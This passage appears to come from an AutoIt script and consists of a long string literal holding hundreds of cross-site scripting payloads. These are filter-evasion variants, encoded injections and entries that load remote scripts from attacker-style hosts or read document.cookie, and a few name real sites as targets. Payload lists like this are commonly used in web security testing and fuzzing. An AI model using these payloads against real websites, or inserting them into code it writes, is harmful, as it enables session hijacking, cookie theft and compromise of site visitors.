"<embed code=%(scriptlet)s></embed>" & @CRLF & _
"<embed code=javascript:javascript:alert(1);></embed>" & @CRLF & _
"<embed src=%(jscript)s></embed>" & @CRLF & _
"<frameset onload=javascript:javascript:alert(1)></frameset>" & @CRLF & _
"<object onerror=javascript:javascript:alert(1)>" & @CRLF & _
"<embed type="image" src=%(scriptlet)s></embed>" & @CRLF & _
"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>" & @CRLF & _
"<IMG SRC=&{javascript:alert(1);};>" & @CRLF & _
"<a href="javAascript:javascript:alert(1)">test1</a>" & @CRLF & _
"<a href="javaascript:javascript:alert(1)">test1</a>" & @CRLF & _
"<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>" & @CRLF & _
"<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">" & @CRLF & _
"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";" & @CRLF & _
"alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--" & @CRLF & _
"></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>" & @CRLF & _
"'';!--"<XSS>=&{()}" & @CRLF & _
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=JaVaScRiPt:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert("XSS")>" & @CRLF & _
"<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" & @CRLF & _
"<a onmouseover="alert(document.cookie)">xxs link</a>" & @CRLF & _
"<a onmouseover=alert(document.cookie)>xxs link</a>" & @CRLF & _
"<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" & @CRLF & _
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" & @CRLF & _
"<IMG SRC=# onmouseover="alert('xxs')">" & @CRLF & _
"<IMG SRC= onmouseover="alert('xxs')">" & @CRLF & _
"<IMG onmouseover="alert('xxs')">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC="jav ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav	ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav
ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav
ascript:alert('XSS');">" & @CRLF & _
"perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out" & @CRLF & _
"<IMG SRC="  javascript:alert('XSS');">" & @CRLF & _
"<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>" & @CRLF & _
"<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<<SCRIPT>alert("XSS");//<</SCRIPT>" & @CRLF & _
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >" & @CRLF & _
"<SCRIPT SRC=//ha.ckers.org/.j>" & @CRLF & _
"<IMG SRC="javascript:alert('XSS')"" & @CRLF & _
"<iframe src=http://ha.ckers.org/scriptlet.html <" & @CRLF & _
"\";alert('XSS');//" & @CRLF & _
"</TITLE><SCRIPT>alert("XSS");</SCRIPT>" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">" & @CRLF & _
"<BODY BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<IMG DYNSRC="javascript:alert('XSS')">" & @CRLF & _
"<IMG LOWSRC="javascript:alert('XSS')">" & @CRLF & _
"<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>" & @CRLF & _
"<IMG SRC='vbscript:msgbox("XSS")'>" & @CRLF & _
"<IMG SRC="livescript:[code]">" & @CRLF & _
"<BODY ONLOAD=alert('XSS')>" & @CRLF & _
"<BGSOUND SRC="javascript:alert('XSS');">" & @CRLF & _
"<BR SIZE="&{alert('XSS')}">" & @CRLF & _
"<LINK REL="stylesheet" HREF="javascript:alert('XSS');">" & @CRLF & _
"<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">" & @CRLF & _
"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" & @CRLF & _
"<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">" & @CRLF & _
"<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>" & @CRLF & _
"<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>" & @CRLF & _
"<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">" & @CRLF & _
"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>" & @CRLF & _
"<STYLE TYPE="text/javascript">alert('XSS');</STYLE>" & @CRLF & _
"<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>" & @CRLF & _
"<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>" & @CRLF & _
"<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>" & @CRLF & _
"<XSS STYLE="xss:expression(alert('XSS'))">" & @CRLF & _
"<XSS STYLE="behavior: url(xss.htc);">" & @CRLF & _
"¼script¾alert(¢XSS¢)¼/script¾" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">" & @CRLF & _
"<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" & @CRLF & _
"<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>" & @CRLF & _
"<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>" & @CRLF & _
"<TABLE BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<TABLE><TD BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<DIV STYLE="background-image: url(javascript:alert('XSS'))">" & @CRLF & _
"<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">" & @CRLF & _
"<DIV STYLE="background-image: url(javascript:alert('XSS'))">" & @CRLF & _
"<DIV STYLE="width: expression(alert('XSS'));">" & @CRLF & _
"<BASE HREF="javascript:alert('XSS');//">" & @CRLF & _
" <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>" & @CRLF & _
"<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>" & @CRLF & _
"<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>" & @CRLF & _
"<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->" & @CRLF & _
"<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>" & @CRLF & _
"<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">" & @CRLF & _
"Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser" & @CRLF & _
"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">" & @CRLF & _
" <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-" & @CRLF & _
"<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<A HREF="http://66.102.7.147/">XSS</A>" & @CRLF & _
"<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>" & @CRLF & _
"<A HREF="http://1113982867/">XSS</A>" & @CRLF & _
"<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>" & @CRLF & _
"<A HREF="http://0102.0146.0007.00000223/">XSS</A>" & @CRLF & _
"<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>" & @CRLF & _
"<iframe src="	javascript:prompt(1)	">" & @CRLF & _
"<svg><style>{font-family:'<iframe/onload=confirm(1)>'" & @CRLF & _
"<input/onmouseover="javaSCRIPT:confirm(1)"" & @CRLF & _
"<sVg><scRipt >alert(1) {Opera}" & @CRLF & _
"<img/src=`` onerror=this.onerror=confirm(1) " & @CRLF & _
"<form><isindex formaction="javascript:confirm(1)"" & @CRLF & _
"<img src=``
 onerror=alert(1)
" & @CRLF & _
"<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>" & @CRLF & _
"<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?" & @CRLF & _
"<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">" & @CRLF & _
"<script /**/>/**/alert(1)/**/</script /**/" & @CRLF & _
""><h1/onmouseover='\u0061lert(1)'>" & @CRLF & _
"<iframe/src="data:text/html,<svg onload=alert(1)>">" & @CRLF & _
"<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>" & @CRLF & _
"<svg><script xlink:href=data:,window.open('https://www.google.com/')></script" & @CRLF & _
"<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}" & @CRLF & _
"<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">" & @CRLF & _
"<iframe src=javascript:alert(document.location)>" & @CRLF & _
"<form><a href="javascript:\u0061lert(1)">X" & @CRLF & _
"</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>" & @CRLF & _
"<img/	  src=`~` onerror=prompt(1)>" & @CRLF & _
"<form><iframe 	  src="javascript:alert(1)" 	;>" & @CRLF & _
"<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a" & @CRLF & _
"http://www.google<script .com>alert(document.location)</script" & @CRLF & _
"<a href=[�]"� onmouseover=prompt(1)//">XYZ</a" & @CRLF & _
"<img/src=@  onerror = prompt('1')" & @CRLF & _
"<style/onload=prompt('XSS')" & @CRLF & _
"<script ^__^>alert(String.fromCharCode(49))</script ^__^" & @CRLF & _
"</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(" & @CRLF & _
"�</form><input type="date" onfocus="alert(1)">" & @CRLF & _
"<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>" & @CRLF & _
"<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/" & @CRLF & _
"<iframe srcdoc='<body onload=prompt(1)>'>" & @CRLF & _
"<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>" & @CRLF & _
"<script ~~~>alert(0%0)</script ~~~>" & @CRLF & _
"<style/onload=<!--	> alert (1)>" & @CRLF & _
"<///style///><span %2F onmousemove='alert(1)'>SPAN" & @CRLF & _
"<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)" & @CRLF & _
""><svg><style>{-o-link-source:'<body/onload=confirm(1)>'" & @CRLF & _
" <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}" & @CRLF & _
"<marquee onstart='javascript:alert(1)'>^__^" & @CRLF & _
"<div/style="width:expression(confirm(1))">X</div> {IE7}" & @CRLF & _
"<iframe// src=javaSCRIPT:alert(1)" & @CRLF & _
"//<form/action=javascript:alert(document.cookie)><input/type='submit'>//" & @CRLF & _
"/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>" & @CRLF & _
"//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\" & @CRLF & _
"</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>" & @CRLF & _
"<a/href="javascript: javascript:prompt(1)"><input type="X">" & @CRLF & _
"</plaintext\></|\><plaintext/onmouseover=prompt(1)" & @CRLF & _
"</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}" & @CRLF & _
"<a href="javascript:\u0061le%72t(1)"><button>" & @CRLF & _
"<div onmouseover='alert(1)'>DIV</div>" & @CRLF & _
"<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">" & @CRLF & _
"<a href="jAvAsCrIpT:alert(1)">X</a>" & @CRLF & _
"<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">" & @CRLF & _
"<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">" & @CRLF & _
"<var onmouseover="prompt(1)">On Mouse Over</var>" & @CRLF & _
"<a href=javascript:alert(document.cookie)>Click Here</a>" & @CRLF & _
"<img src="/" =_=" title="onerror='prompt(1)'">" & @CRLF & _
"<%<!--'%><script>alert(1);</script -->" & @CRLF & _
"<script src="data:text/javascript,alert(1)"></script>" & @CRLF & _
"<iframe/src \/\/onload = prompt(1)" & @CRLF & _
"<iframe/onreadystatechange=alert(1)" & @CRLF & _
"<svg/onload=alert(1)" & @CRLF & _
"<input value=<><iframe/src=javascript:confirm(1)" & @CRLF & _
"<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>" & @CRLF & _
"<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>" & @CRLF & _
"<img src=`xx:xx`onerror=alert(1)>" & @CRLF & _
"<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>" & @CRLF & _
"<meta http-equiv="refresh" content="0;javascript:alert(1)"/>" & @CRLF & _
"<math><a xlink:href="//jsfiddle.net/t846h/">click" & @CRLF & _
"<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>" & @CRLF & _
"<svg contentScriptType=text/vbs><script>MsgBox+1" & @CRLF & _
"<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a" & @CRLF & _
"<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>" & @CRLF & _
"<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+" & @CRLF & _
"<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F" & @CRLF & _
"<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script" & @CRLF & _
"<object data=javascript:\u0061le%72t(1)>" & @CRLF & _
"<script>+-+-1-+-+alert(1)</script>" & @CRLF & _
"<body/onload=<!-->
alert(1)>" & @CRLF & _
"<script itworksinallbrowsers>/*<script* */alert(1)</script" & @CRLF & _
"<img src ?itworksonchrome?\/onerror = alert(1)" & @CRLF & _
"<svg><script>//
confirm(1);</script </svg>" & @CRLF & _
"<svg><script onlypossibleinopera:-)> alert(1)" & @CRLF & _
"<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe" & @CRLF & _
"<script x> alert(1) </script 1=2" & @CRLF & _
"<div/onmouseover='alert(1)'> style="x:">" & @CRLF & _
"<--`<img/src=` onerror=alert(1)> --!>" & @CRLF & _
"<script/src=data:text/javascript,alert(1)></script>" & @CRLF & _
"<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>" & @CRLF & _
""><img src=x onerror=window.open('https://www.google.com/');>" & @CRLF & _
"<form><button formaction=javascript:alert(1)>CLICKME" & @CRLF & _
"<math><a xlink:href="//jsfiddle.net/t846h/">click" & @CRLF & _
"<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>" & @CRLF & _
"<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>" & @CRLF & _
"<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>" & @CRLF & _
"" & @CRLF & _
"'';!--"<XSS>=&{()}" & @CRLF & _
"'>//\\,<'>">">"*"" & @CRLF & _
"'); alert('XSS" & @CRLF & _
"<script>alert(1);</script>" & @CRLF & _
"<script>alert('XSS');</script>" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert("XSS")>" & @CRLF & _
"<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" & @CRLF & _
"<scr<script>ipt>alert('XSS');</scr</script>ipt>" & @CRLF & _
"<script>alert(String.fromCharCode(88,83,83))</script> " & @CRLF & _
"<img src=foo.png onerror=alert(/xssed/) />" & @CRLF & _
"<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>" & @CRLF & _
"<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>" & @CRLF & _
"<marquee><script>alert('XSS')</script></marquee>" & @CRLF & _
"<IMG SRC=\"jav	ascript:alert('XSS');\">" & @CRLF & _
"<IMG SRC=\"jav
ascript:alert('XSS');\">" & @CRLF & _
"<IMG SRC=\"jav
ascript:alert('XSS');\">" & @CRLF & _
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" & @CRLF & _
""><script>alert(0)</script>" & @CRLF & _
"<script src=http://yoursite.com/your_files.js></script>" & @CRLF & _
"</title><script>alert(/xss/)</script>" & @CRLF & _
"</textarea><script>alert(/xss/)</script>" & @CRLF & _
"<IMG LOWSRC=\"javascript:alert('XSS')\">" & @CRLF & _
"<IMG DYNSRC=\"javascript:alert('XSS')\">" & @CRLF & _
"<font style='color:expression(alert(document.cookie))'>" & @CRLF & _
"<img src="javascript:alert('XSS')">" & @CRLF & _
"<script language="JavaScript">alert('XSS')</script>" & @CRLF & _
"<body onunload="javascript:alert('XSS');">" & @CRLF & _
"<body onLoad="alert('XSS');"" & @CRLF & _
"[color=red' onmouseover="alert('xss')"]mouse over[/color]" & @CRLF & _
""/></a></><img src=1.gif onerror=alert(1)>" & @CRLF & _
"window.alert("Bonjour !");" & @CRLF & _
"<div style="x:expression((window.r==1)?'':eval('r=1;" & @CRLF & _
"alert(String.fromCharCode(88,83,83));'))">" & @CRLF & _
"<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>" & @CRLF & _
""><script alert(String.fromCharCode(88,83,83))</script>" & @CRLF & _
"'>><marquee><h1>XSS</h1></marquee>" & @CRLF & _
"'">><script>alert('XSS')</script>" & @CRLF & _
"'">><marquee><h1>XSS</h1></marquee>" & @CRLF & _
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" & @CRLF & _
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" & @CRLF & _
"<script>var var = 1; alert(var)</script>" & @CRLF & _
"<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>" & @CRLF & _
"<?='<SCRIPT>alert("XSS")</SCRIPT>'?>" & @CRLF & _
"<IMG SRC='vbscript:msgbox(\"XSS\")'>" & @CRLF & _
"" onfocus=alert(document.domain) "> <"" & @CRLF & _
"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" & @CRLF & _
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" & @CRLF & _
"perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out" & @CRLF & _
"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out" & @CRLF & _
"<br size=\"&{alert('XSS')}\">" & @CRLF & _
"<scrscriptipt>alert(1)</scrscriptipt>" & @CRLF & _
"</br style=a:expression(alert())>" & @CRLF & _
"</script><script>alert(1)</script>" & @CRLF & _
""><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>" & @CRLF & _
"[color=red width=expression(alert(123))][color]" & @CRLF & _
"<BASE HREF="javascript:alert('XSS');//">" & @CRLF & _
"Execute(MsgBox(chr(88)&chr(83)&chr(83)))<" & @CRLF & _
""></iframe><script>alert(123)</script>" & @CRLF & _
"<body onLoad="while(true) alert('XSS');">" & @CRLF & _
"'"></title><script>alert(1111)</script>" & @CRLF & _
"</textarea>'"><script>alert(document.cookie)</script>" & @CRLF & _
"'""><script language="JavaScript"> alert('X \nS \nS');</script>" & @CRLF & _
"</script></script><<<<script><>>>><<<script>alert(123)</script>" & @CRLF & _
"<html><noalert><noscript>(123)</noscript><script>(123)</script>" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">" & @CRLF & _
"'></select><script>alert(123)</script>" & @CRLF & _
"'>"><script src = 'http://www.site.com/XSS.js'></script>" & @CRLF & _
"}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>" & @CRLF & _
"<SCRIPT>document.write("XSS");</SCRIPT>" & @CRLF & _
"a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);" & @CRLF & _
"='><script>alert("xss")</script>" & @CRLF & _
"<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>" & @CRLF & _
"<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>" & @CRLF & _
"">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>" & @CRLF & _
"">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>" & @CRLF & _
"src="http://www.site.com/XSS.js"></script>" & @CRLF & _
"data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=" & @CRLF & _
"!--" /><script>alert('xss');</script>" & @CRLF & _
"<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
""><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
"'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
"<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
"<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
""><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>" & @CRLF & _
"'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
"<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>" & @CRLF & _
"'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='" & @CRLF & _
""><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="" & @CRLF & _
"\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'" & @CRLF & _
"http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??" & @CRLF & _
"http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??" & @CRLF & _
"'); alert('xss'); var x='" & @CRLF & _
"\\'); alert(\'xss\');var x=\'" & @CRLF & _
"//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));" & @CRLF & _
">"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>" & @CRLF & _
"<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>" & @CRLF & _
"</body>" & @CRLF & _
"</html>" & @CRLF & _
"<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>" & @CRLF & _
"<SCRIPT> alert(“XSS”); </SCRIPT>" & @CRLF & _
"<BODY ONLOAD=alert("XSS")>" & @CRLF & _
"<BODY BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG DYNSRC="javascript:alert('XSS')">" & @CRLF & _
